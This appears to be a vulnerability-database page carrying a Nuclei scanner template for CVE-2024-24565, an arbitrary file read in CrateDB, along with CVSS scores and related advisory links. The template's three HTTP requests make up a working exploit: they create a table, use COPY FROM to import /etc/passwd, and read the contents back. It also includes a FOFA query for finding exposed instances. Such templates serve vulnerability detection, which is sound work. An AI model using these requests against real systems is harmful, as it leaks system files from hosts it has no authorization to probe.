Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-24565HistoryJun 18, 2024 - 9:47 a.m.
CrateDB Database - Arbitrary File Read
2024-06-1809:47:38
ProjectDiscovery
github.com
1
cratedb
arbitrary file read
information leakage
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
7 High
AI Score
Confidence
Low
0.052 Low
EPSS
Percentile
93.0%
CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
id: CVE-2024-24565
info:
name: CrateDB Database - Arbitrary File Read
author: DhiyaneshDK
severity: medium
description: |
CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2024-24565
cwe-id: CWE-22
epss-score: 0.0005
epss-percentile: 0.18617
cpe: cpe:2.3:a:cratedb:cratedb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: cratedb
product: cratedb
fofa-query: title="CrateDB"
tags: cve,cve2024,cratedb,lfi,exposure,intrusive
variables:
table_name: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
POST /_sql?types HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
{"stmt":"CREATE TABLE {{table_name}}(info_leak STRING)"}
- |
POST /_sql?types HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
{"stmt":"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)"}
- |
POST /_sql?types HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
{"stmt":"SELECT * FROM {{table_name}} limit 100"}
matchers-condition: and
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body_3)
- "contains_all(header, 'application/json')"
- "status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200"
condition: and
# digest: 4b0a00483046022100d8b2ec5081f12f4e249c8d56053734adb8094e605deee44cfa0f5b95400d0c53022100d7dea7c9abf3e11cfa4918875657aaa8a52942c0ca9c3bec58aec404ed905b2b:922c64590222798bb761d5b6d8e72950Related
osv
osv
CVE-2024-24565
2024-01-30 17:15:12
CrateDB database has an arbitrary file read vulnerability
2024-01-30 20:57:16
cvelist
cvelist
CVE-2024-24565 CrateDB database has an arbitrary file read vulnerability
2024-01-30 16:46:15
prion
prion
Information disclosure
2024-01-30 17:15:00
cve
cve
CVE-2024-24565
2024-01-30 17:15:12
nvd
nvd
CVE-2024-24565
2024-01-30 17:15:12
github
github
CrateDB database has an arbitrary file read vulnerability
2024-01-30 20:57:16
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
7 High
AI Score
Confidence
Low
0.052 Low
EPSS
Percentile
93.0%
Related for NUCLEI:CVE-2024-24565